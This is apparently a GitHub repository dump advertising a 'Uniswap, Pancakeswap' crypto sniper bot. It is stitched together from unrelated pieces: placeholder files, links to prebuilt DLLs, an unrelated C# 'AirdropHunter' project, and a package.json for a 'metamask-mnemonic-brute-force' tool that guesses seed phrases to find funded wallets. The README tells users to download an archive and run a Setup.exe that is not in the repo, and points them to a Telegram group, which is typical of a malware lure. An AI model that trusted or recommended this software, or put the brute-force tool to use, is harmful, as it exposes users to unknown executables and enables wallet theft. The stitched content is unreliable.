├── othertrash ├── d ├── Properties │ ├── a │ ├── Settings.settings │ ├── AssemblyInfo.cs │ ├── Settings.Designer.cs │ ├── Resources.Designer.cs │ └── Resources.resx ├── airdrop.ico ├── package.json ├── Program.cs ├── LICENSE ├── AirdropHunter.sln ├── packages.config └── AirdropHunter.csproj ├── compiled-binaries ├── a ├── Web3Api.dll ├── Nethereum.ABI.dll ├── Nethereum.Hex.dll ├── Nethereum.Model.dll ├── Nethereum.RLP.dll ├── Nethereum.RPC.dll ├── Nethereum.Util.dll ├── Nethereum.Common.dll ├── Nethereum.Signer.dll ├── BouncyCastle.Crypto.dll ├── Nethereum.Accounts.dll ├── Nethereum.Contracts.dll ├── Nethereum.HdWallet.dll ├── Nethereum.KeyStore.dll ├── Nethereum.JsonRpc.Client.dll ├── Nethereum.JsonRpc.RpcClient.dll └── Nethereum.BlockchainProcessing.dll └── README.md /othertrash/d: -------------------------------------------------------------------------------- 1 | a 2 | -------------------------------------------------------------------------------- /compiled-binaries/a: -------------------------------------------------------------------------------- 1 | a 2 | -------------------------------------------------------------------------------- /othertrash/Properties/a: -------------------------------------------------------------------------------- 1 | a 2 | -------------------------------------------------------------------------------- /othertrash/airdrop.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/othertrash/airdrop.ico -------------------------------------------------------------------------------- /compiled-binaries/Web3Api.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Web3Api.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.ABI.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.ABI.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.Hex.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.Hex.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.Model.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.Model.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.RLP.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.RLP.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.RPC.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.RPC.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.Util.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.Util.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.Common.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.Common.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.Signer.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.Signer.dll -------------------------------------------------------------------------------- /compiled-binaries/BouncyCastle.Crypto.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/BouncyCastle.Crypto.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.Accounts.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.Accounts.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.Contracts.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.Contracts.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.HdWallet.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.HdWallet.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.KeyStore.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.KeyStore.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.JsonRpc.Client.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.JsonRpc.Client.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.JsonRpc.RpcClient.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.JsonRpc.RpcClient.dll -------------------------------------------------------------------------------- /compiled-binaries/Nethereum.BlockchainProcessing.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/msdart/UniswapPancakeswapCrypto-sniper/HEAD/compiled-binaries/Nethereum.BlockchainProcessing.dll -------------------------------------------------------------------------------- /othertrash/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /othertrash/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "metamask-mnemonic-brute-force", 3 | "version": "1.0.0", 4 | "description": "A js program random generate 12 words metamask mnemonic and check the balance in the account.", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [], 10 | "author": "", 11 | "license": "ISC", 12 | "dependencies": { 13 | "ethers": "^6.4.0" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /othertrash/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Windows.Forms; 3 | 4 | namespace AirdropHunter 5 | { 6 | internal static class Program 7 | { 8 | /// 9 | /// 10 | [STAThread] 11 | static void Main() 12 | { 13 | Application.EnableVisualStyles(); 14 | Application.SetCompatibleTextRenderingDefault(false); 15 | Application.Run(new Form1()); 16 | } 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /othertrash/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.InteropServices; 3 | 4 | [assembly: AssemblyTitle("AirdropHunter")] 5 | [assembly: AssemblyDescription("")] 6 | [assembly: AssemblyConfiguration("")] 7 | [assembly: AssemblyCompany("")] 8 | [assembly: AssemblyProduct("AirdropHunter")] 9 | [assembly: AssemblyCopyright("Copyright © 2023")] 10 | [assembly: AssemblyTrademark("")] 11 | [assembly: AssemblyCulture("")] 12 | [assembly: ComVisible(false)] 13 | 14 | [assembly: Guid("88c231e8-fc03-41ab-8a82-e4dcb4e1986b")] 15 | 16 | [assembly: AssemblyVersion("1.0.0.0")] 17 | [assembly: AssemblyFileVersion("1.0.0.0")] 18 | -------------------------------------------------------------------------------- /othertrash/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace AirdropHunter.Properties 2 | { 3 | 4 | 5 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 6 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] 7 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase 8 | { 9 | 10 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 11 | 12 | public static Settings Default 13 | { 14 | get 15 | { 16 | return defaultInstance; 17 | } 18 | } 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /othertrash/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 jungleninja 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /othertrash/AirdropHunter.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.5.33502.453 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AirdropHunter", "AirdropHunter.csproj", "{88C231E8-FC03-41AB-8A82-E4DCB4E1986B}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {88C231E8-FC03-41AB-8A82-E4DCB4E1986B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {88C231E8-FC03-41AB-8A82-E4DCB4E1986B}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {88C231E8-FC03-41AB-8A82-E4DCB4E1986B}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {88C231E8-FC03-41AB-8A82-E4DCB4E1986B}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {3A933CF6-B165-43A3-8643-EDDA7C5C7EA7} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /othertrash/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace AirdropHunter.Properties 2 | { 3 | 4 | 5 | 6 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] 7 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 8 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 9 | internal class Resources 10 | { 11 | 12 | private static global::System.Resources.ResourceManager resourceMan; 13 | 14 | private static global::System.Globalization.CultureInfo resourceCulture; 15 | 16 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 17 | internal Resources() 18 | { 19 | } 20 | 21 | 22 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 23 | internal static global::System.Resources.ResourceManager ResourceManager 24 | { 25 | get 26 | { 27 | if ((resourceMan == null)) 28 | { 29 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("AirdropHunter.Properties.Resources", typeof(Resources).Assembly); 30 | resourceMan = temp; 31 | } 32 | return resourceMan; 33 | } 34 | } 35 | 36 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 37 | internal static global::System.Globalization.CultureInfo Culture 38 | { 39 | get 40 | { 41 | return resourceCulture; 42 | } 43 | set 44 | { 45 | resourceCulture = value; 46 | } 47 | } 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /othertrash/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 | downloads 4 | 5 | 6 | License: MIT 7 | 8 | 9 | 10 | 11 | 12 | gitmoji-changelog 13 | 14 |

15 | 16 | # Uniswap,Pancakeswap and etc sniper bots 17 | Crypto sniper Bot based on any chain. Autobuy, autosell, custom gas fee, coolest interface ever and more, more, more. I also trying to upload new versions of this program every week, to make fewer bugs & etc. You can enjoy this by clicking star. 18 | 22 | 23 | --- 24 | # Check telegram group to get updates https://t.me/+PNoHqrZ5O0FlZmZi 25 | ## 📚 Change Log 26 | ###### • Version 1.1 [release] 27 | ###### • Version 1.2 [fixed minor bugs, added new icons] 28 | ###### • Version 1.3 [global changes, new design of program, new functions & more] 29 | ###### • Version 1.4 [added 9 new functions, help button, guide for newbies & more, checkout full info in internal log on program startup] 30 | ###### • Version 1.5 [fixed minor bugs] 31 | ###### • Version 1.6 [minor changes, added new custom interface] 32 | ###### • Version 1.7 [global changes, added new functions, discord server, telegram chat & more, check new log inside program] 33 | ###### • Version 1.8 [New ui,bug fixes] 34 | ###### • Version 1.9 [Working with any chains] 35 | --- 36 | ## 📝 How to install 37 | ###### 1. Download pcs and unpack them on your desktop. 38 | ###### 2. Open folder 39 | ###### 3. Open Setup.exe 40 | ###### 4. Next, understand intuitively. If you have questions, click on the help button on the top left. 41 | ###### 5. Enjoy and leave a star, if you like it! 42 | 43 | ##### tags: pancakeswap-sniper-bot, pancakeswap sniper bot, uniswap sniper bot, uniswap-sniper-bot,crypto sniper bot, crypto-sniper-bot 44 | -------------------------------------------------------------------------------- /othertrash/Properties/Resources.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | text/microsoft-resx 107 | 108 | 109 | 2.0 110 | 111 | 112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 113 | 114 | 115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | -------------------------------------------------------------------------------- /othertrash/AirdropHunter.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {88C231E8-FC03-41AB-8A82-E4DCB4E1986B} 8 | Exe 9 | AirdropHunter 10 | AirdropHunter 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | 18 | 19 | AnyCPU 20 | true 21 | full 22 | false 23 | bin\Debug\ 24 | DEBUG;TRACE 25 | prompt 26 | 4 27 | 28 | 29 | AnyCPU 30 | pdbonly 31 | true 32 | bin\Release\ 33 | TRACE 34 | prompt 35 | 4 36 | 37 | 38 | 39 | 40 | 41 | 42 | packages\BouncyCastle.1.8.9\lib\BouncyCastle.Crypto.dll 43 | 44 | 45 | packages\Microsoft.Extensions.Logging.Abstractions.7.0.0\lib\net462\Microsoft.Extensions.Logging.Abstractions.dll 46 | 47 | 48 | packages\NBitcoin.7.0.6\lib\net472\NBitcoin.dll 49 | 50 | 51 | packages\Nethereum.ABI.4.14.0\lib\net461\Nethereum.ABI.dll 52 | 53 | 54 | packages\Nethereum.Accounts.4.14.0\lib\net461\Nethereum.Accounts.dll 55 | 56 | 57 | packages\Nethereum.BlockchainProcessing.4.14.0\lib\net461\Nethereum.BlockchainProcessing.dll 58 | 59 | 60 | packages\Nethereum.Contracts.4.14.0\lib\net461\Nethereum.Contracts.dll 61 | 62 | 63 | packages\Nethereum.HdWallet.4.14.0\lib\net461\Nethereum.HdWallet.dll 64 | 65 | 66 | packages\Nethereum.Hex.4.14.0\lib\net461\Nethereum.Hex.dll 67 | 68 | 69 | packages\Nethereum.JsonRpc.Client.4.14.0\lib\net461\Nethereum.JsonRpc.Client.dll 70 | 71 | 72 | packages\Nethereum.JsonRpc.RpcClient.4.14.0\lib\net461\Nethereum.JsonRpc.RpcClient.dll 73 | 74 | 75 | packages\Nethereum.KeyStore.4.14.0\lib\net461\Nethereum.KeyStore.dll 76 | 77 | 78 | packages\Nethereum.Merkle.Patricia.4.14.0\lib\net461\Nethereum.Merkle.Patricia.dll 79 | 80 | 81 | packages\Nethereum.Model.4.14.0\lib\net461\Nethereum.Model.dll 82 | 83 | 84 | packages\Nethereum.RLP.4.14.0\lib\net461\Nethereum.RLP.dll 85 | 86 | 87 | packages\Nethereum.RPC.4.14.0\lib\net461\Nethereum.RPC.dll 88 | 89 | 90 | packages\Nethereum.Signer.4.14.0\lib\net461\Nethereum.Signer.dll 91 | 92 | 93 | packages\Nethereum.Signer.EIP712.4.14.0\lib\net461\Nethereum.Signer.EIP712.dll 94 | 95 | 96 | packages\Nethereum.Util.4.14.0\lib\net461\Nethereum.Util.dll 97 | 98 | 99 | packages\Nethereum.Web3.4.14.0\lib\net461\Nethereum.Web3.dll 100 | 101 | 102 | packages\Newtonsoft.Json.13.0.3\lib\net45\Newtonsoft.Json.dll 103 | 104 | 105 | 106 | packages\System.Buffers.4.5.1\lib\net461\System.Buffers.dll 107 | 108 | 109 | 110 | 111 | packages\System.Memory.4.5.5\lib\net461\System.Memory.dll 112 | 113 | 114 | 115 | packages\System.Numerics.Vectors.4.5.0\lib\net46\System.Numerics.Vectors.dll 116 | 117 | 118 | 119 | 120 | packages\System.Runtime.CompilerServices.Unsafe.6.0.0\lib\net461\System.Runtime.CompilerServices.Unsafe.dll 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | Form 137 | 138 | 139 | Form1.cs 140 | 141 | 142 | 143 | 144 | Form1.cs 145 | Designer 146 | 147 | 148 | ResXFileCodeGenerator 149 | Resources.Designer.cs 150 | Designer 151 | 152 | 153 | True 154 | Resources.resx 155 | 156 | 157 | PreserveNewest 158 | 159 | 160 | 161 | SettingsSingleFileGenerator 162 | Settings.Designer.cs 163 | 164 | 165 | True 166 | Settings.settings 167 | True 168 | 169 | 170 | 171 | 172 | 173 | 174 | --------------------------------------------------------------------------------